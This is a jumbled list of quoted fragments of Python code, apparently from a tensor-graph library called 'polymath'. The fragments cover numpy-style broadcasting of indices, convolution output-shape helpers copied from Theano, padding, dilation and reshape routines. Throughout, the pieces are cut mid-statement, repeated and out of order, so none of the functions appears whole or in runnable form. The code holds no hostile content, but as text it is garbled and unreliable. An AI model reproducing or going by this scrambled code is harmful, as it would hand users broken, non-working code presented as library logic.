RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return", "if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], )", "respectively to: batch size, number of input channels, height and width (and possibly", "i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if", "correspond respectively to : number of output channels, number of input channels, height", "a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i]", "size on right. \"\"\" # pad_h = pad_w = padding * 2 pad_h", "height and width of the output, number of input channels, height and width", "(2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image shape on", "a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] =", "abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]:", "): \"\"\"This function compute the output shape of convolution operation. Copied and simplified", "idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape ==", "= _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([])", "len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ):", "out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices:", "range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else:", "idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is None: assert", "range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] )", "idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i", "if len(pad_size) == 2: # pad_h = pad_size[0] * 2 # pad_w =", "------- pad_top : int Padding size on top pad_left : int Padding size", "cnt = 0 op1 = [] op2 = [] all_ops = [] for", "border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp = tuple(", "= True if not broadcastable: reverse = False a_idx = [None] * len(node_a.shape)", "oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] =", "not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for s in", "idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx)", "1) out_idx.append(idx) if s in node_a.shape: start = 0 if s in a_map:", "input channels, height and width of the kernel. None where undefined. border_mode: string,", "and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in", "np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = []", "def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices,", "tuple of int corresponding to the kernel shape. For a normal convolution, its", "= border_mode # In case of symbolic shape, we want to build the", "want to build the smallest graph # (image_shape + 2 * pad -", "= image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:]", "== pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape indices =", "1 add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim", "# if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h =", "respectively to the dilation on height and width axis. Returns ------- output_shape: tuple", "must correspond to : number of output channels, height and width of the", "= [] all_ops = [] for i in node_a.shape: if i == 1:", "must be 'valid' or 'full'. If it is a tuple, its two (or", "subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of convolution operation.", "corresponding to the input image shape. Its four (or five) element must correspond", "nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i],", "broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx = []", "on the considered axis. dilation: int. It must correspond to the dilation on", "else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i", "if pad_r != 0: out_shp += pad_r if subsample != 1: out_shp =", "i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1)", "else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if", "shp2[::-1]): if a == 1 or b == 1 or a == b:", "output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise", "to: batch size, number of output channels, height and width of the image.", "1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx)", "data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left + p_right padded_shape", "node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node =", "tuple of int corresponding to the output image shape. Its four element must", "oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3]", "pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r =", "f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx", "node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape ==", "= False a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map", "for idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]:", "on a given axis. kernel_shape: int Corresponds to the kernel shape on a", "= a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"]", "output_shape: tuple of int corresponding to the output image shape. Its four element", "out_shp += pad_l if pad_r != 0: out_shp += pad_r if subsample !=", "= () shape_idx = () for i in range(n): out_shape += ((var.shape[i] -", "out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s in node_a.shape: idx", "= () for i in range(n): out_shape += ((var.shape[i] - 1) * strides[i]", "pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n out_shape = ()", "tuple of int Conv kernel size Returns ------- pad_top : int Padding size", "1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if i in", "# else: # assert isinstance(pad_size, int) # pad_h = pad_w = pad_size *", "1) // 2 # return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left", "and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape", "b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx)", "dim if dim < 0: dim = len(a_shp) + dim return dim def", "kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i],", "corresponding to the output image shape on the considered axis. \"\"\" # Implicit", "the same value cnt = 0 op1 = [] op2 = [] all_ops", "# # pad_top = (pad_h + 1) // 2 # pad_left = (pad_w", "= (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape", "the kernel. For an unshared 2D convolution, its six channels must correspond to", "the padding on height and width (and possibly depth) axis. subsample: tuple of", "+= ((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] -", "in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s", "2 or 4\") # else: # assert isinstance(pad_size, int) # pad_h = pad_w", "tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1)", "two or three elements correspond respectively to the dilation on height and width", "np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node,", "len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i]", "Conv kernel size Returns ------- pad_top : int Padding size on top pad_left", "number of input channels, height and width of the kernel. None where undefined.", "about multiple dimensions with the same value cnt = 0 op1 = []", "2 # pad_w = pad_size[1] * 2 # elif len(pad_size) == 4: #", "respectively to : number of output channels, number of input channels, height and", "1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] -", "src_indices = [] dst_indices = [] for s in data.shape: idx = pm.index(0,", "node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0,", "image_shape: int Corresponds to the input image shape on a given axis. kernel_shape:", "and width of the output, number of input channels, height and width of", "Corresponds to the kernel shape on a given axis. border_mode: string or int.", "== 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) #", "ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx,", ") else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for", "b_idx = [] out_idx = [] nmap = {} reverse = True if", "= format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape):", "a_idx = [] b_idx = [] out_idx = [] nmap = {} reverse", "shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0", "if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode", "reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides)", "= pad_w = padding * 2 pad_h = padding[0] * 2 pad_w =", "+ p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape !=", "== 1 or a == b: pass else: return False return True #", "border_mode # In case of symbolic shape, we want to build the smallest", "== node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx)", "[None] * len(node_b.shape) a_map = {} b_map = {} for s in node_c.shape:", "value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2,", "1 or b == 1 or a == b: pass else: return False", "= pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx", "+ p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and", "n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx", "string, it must be 'valid' or 'full'. If it is a tuple, its", "range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0,", "subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis(", "if pad_l != 0: out_shp += pad_l if pad_r != 0: out_shp +=", "= pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)]", "border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize, nkern) +", "# TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\")", "tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape):", "or ['VALID', 'SAME'] kernel : tuple of int Conv kernel size Returns -------", "the input image shape on a given axis. kernel_shape: int Corresponds to the", "a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\"", "can only be 2 or 4\") # else: # assert isinstance(pad_size, int) #", "number of output channels, number of input channels, height and width (and possibly", "is a tuple, its two (or three) elements respectively correspond to the padding", "image. None where undefined. kernel_shape: tuple of int corresponding to the kernel shape.", "or three elements respectively correspond to the subsampling on height and width (and", "if s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] =", "padding : int or str Padding size, or ['VALID', 'SAME'] kernel : tuple", "= idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is None:", "out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample,", "convolution, its six channels must correspond to : number of output channels, height", "respectively correspond to the subsampling on height and width (and possibly depth) axis.", "polymath as pm import numpy as np def format_idx(x, reverse=True): if reverse: return", "def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top,", "the output image shape on the considered axis. \"\"\" # Implicit dilated kernel", "data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx,", "pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx,", "tuple of int. If it is a string, it must be 'valid' or", "axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError", "x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim is None: return", "f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx", "possibly depth) of the image. None where undefined. kernel_shape: tuple of int corresponding", "import polymath as pm import numpy as np def format_idx(x, reverse=True): if reverse:", "all_ops = [] for s in out_node.shape: if s in node_a.shape: idx =", "== node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0]", "STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset", "dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return idx", "padding * 2 pad_h = padding[0] * 2 pad_w = padding[1] * 2", "1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] -", "in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0 for d", "---------- image_shape: int Corresponds to the input image shape on a given axis.", "kernel : tuple of int Conv kernel size Returns ------- pad_top : int", "op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else:", "theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image shape", "'valid' or 'full'. subsample: int. It must correspond to the subsampling on the", "broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx =", "build the smallest graph # (image_shape + 2 * pad - dil_kernel_shape) //", "for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i]", "- 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1)", "op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if", "add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx =", "node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape: start", "for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx =", "dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if border_mode == \"full\":", "correspond respectively to the dilation on height and width axis. Returns ------- output_shape:", "= 0 if s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start)", "imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0],", "dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n out_shape =", "elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices:", "= pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx,", "not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def", "_get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return", "dim < 0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape,", "- 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 #", "For an unshared 2D convolution, its six channels must correspond to : number", "tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) )", "node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices,", "(image_shape + 2 * pad - dil_kernel_shape) // subsample + 1 out_shp =", "a == 1 or b == 1 or a == b: pass else:", "number of input channels, height and width (and possibly depth) of the kernel.", "+ p_top + p_bottom ow = data.shape[3] + p_left + p_right padded_shape =", "= b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) <", "shape. Its four (or five) element must correspond respectively to: batch size, number", "tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i", "oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal", "zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0,", "is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or", "height and width (and possibly depth) axis. subsample: tuple of int. Its two", "< abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] ==", "numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx", "len(strides) == n out_shape = () nz_indices = () shape_idx = () for", "node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx", "- pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the", "border_mode: string or int. If it is a string, it must be 'valid'", "1: out_shp = out_shp // subsample out_shp = out_shp + 1 return out_shp", "* len(node_b.shape) a_map = {} b_map = {} for s in node_c.shape: idx", "shape on a given axis. border_mode: string or int. If it is a", "Parameters ---------- padding : int or str Padding size, or ['VALID', 'SAME'] kernel", "broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse)", "https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image shape on a", "sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i in", "shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if border_mode ==", "or str Padding size, or ['VALID', 'SAME'] kernel : tuple of int Conv", "axis. border_mode: string or int. If it is a string, it must be", "to: batch size, number of input channels, height and width (and possibly depth)", "top pad_left : int Padding size on left pad_down : int Padding size", "1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx", "2 # # pad_top = (pad_h + 1) // 2 # pad_left =", "idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1:", "1 for i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx])", "[] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0:", "dim): if dim is None: return dim if dim < 0: dim =", "1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is None: assert", "Padding size, or ['VALID', 'SAME'] kernel : tuple of int Conv kernel size", "Returns ------- out_shp: int corresponding to the output image shape on the considered", "dilation: int. It must correspond to the dilation on the considered axis. Returns", "padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx +", "= 0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset =", "of int. Its two or three elements respectively correspond to the subsampling on", "or a == b: pass else: return False return True # Use numpy", "ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx,", "dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function", "isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2 # # pad_top", "pad_size[0] * 2 # pad_w = pad_size[1] * 2 # elif len(pad_size) ==", "i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i", "and width (and possibly depth) axis. subsample: tuple of int. Its two or", "pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape)", "== pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if", "height and width of the kernel. None where undefined. border_mode: string, or tuple", "shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b", "# all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt +=", "s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert", "== 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx)", "must correspond respectively to: batch size, number of input channels, height and width", "in node_b.shape: start = 0 if s in b_map: start = b_map[s] sidx", "image_shape: tuple of int corresponding to the input image shape. Its four (or", "compute the output shape of convolution operation. Copied and simplified from theano (2020/11/08):", "a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b == 1", "node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]:", "pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters ----------", "= [] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP", "len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise", "node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i", "- 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i]", "* dilation + 1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape", "'valid' or 'full'. If it is a tuple, its two (or three) elements", "if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices =", "convolution, its four (for 2D convolution) or five (for 3D convolution) elements must", "kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel)", "indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return", "if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape:", "if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx)", "or 4\") # else: # assert isinstance(pad_size, int) # pad_h = pad_w =", "image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if", "bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp =", "return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common", "other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None):", "string, or tuple of int. If it is a string, it must be", "shape on the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape =", "pad_top = (pad_h + 1) // 2 pad_left = (pad_w + 1) //", "and width axis. Returns ------- output_shape: tuple of int corresponding to the output", "dilation on height and width axis. Returns ------- output_shape: tuple of int corresponding", "= 0 idx_offset = 1 add_dim = 0 for d in reversed(dc): idx", "* 2 # # pad_top = (pad_h + 1) // 2 # pad_left", "in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0)", "1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx", "axis. dilation: int. It must correspond to the dilation on the considered axis.", "pad_l if pad_r != 0: out_shp += pad_r if subsample != 1: out_shp", "image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r !=", "reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices", "pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx =", "def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape:", "node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)): if", "the kernel shape. For a normal convolution, its four (for 2D convolution) or", "s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1],", "imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize,", "out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0)", "indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return", "numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x)", "undefined. kernel_shape: tuple of int corresponding to the kernel shape. For a normal", "ValueError(\"Size of padding can only be 2 or 4\") # else: # assert", ": int Padding size on top pad_left : int Padding size on left", "if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for", "# all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt +=", "i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i],", "Returns ------- pad_top : int Padding size on top pad_left : int Padding", "dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r != 0: out_shp", "1) for s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if", "0: out_shp += pad_r if subsample != 1: out_shp = out_shp // subsample", "from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to the", "dilation + 1 if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape -", "== 1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is None:", "https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to the input image shape.", "pad_r if subsample != 1: out_shp = out_shp // subsample out_shp = out_shp", "(pad_h + 1) // 2 # pad_left = (pad_w + 1) // 2", "> idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx,", "data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] -", "- pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0):", "tuple, its two (or three) elements respectively correspond to the padding on height", "pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if", "b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] =", "tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape", "pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) ==", "0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d]", "depth) of the image. None where undefined. kernel_shape: tuple of int corresponding to", ": int Padding size on down. pad_right : int Padding size on right.", "op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if i in node_a.shape:", "to the kernel shape on a given axis. border_mode: string or int. If", "pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4", "= [] nmap = {} reverse = True if not broadcastable: reverse =", "i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1)", "pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx and", ": int Padding size on right. \"\"\" # pad_h = pad_w = padding", "return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) ==", "start) b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i]", "== \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\":", "the image. None where undefined. kernel_shape: tuple of int corresponding to the kernel", "(pad_w + 